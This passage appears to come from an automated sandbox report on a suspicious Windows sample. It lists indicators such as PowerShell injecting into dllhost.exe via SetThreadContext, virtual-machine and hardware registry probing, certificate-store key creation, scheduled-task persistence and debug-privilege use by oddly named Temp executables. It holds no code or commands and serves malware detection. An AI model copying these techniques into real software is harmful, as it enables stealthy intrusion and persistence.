File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 C:\Windows\system32\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\system32\svchost.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3688 set thread context of 3652 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Mfg C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000\LogConf C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1720461025" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Modifies registry class

Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" C:\Windows\system32\sihost.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Windows\Explorer.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
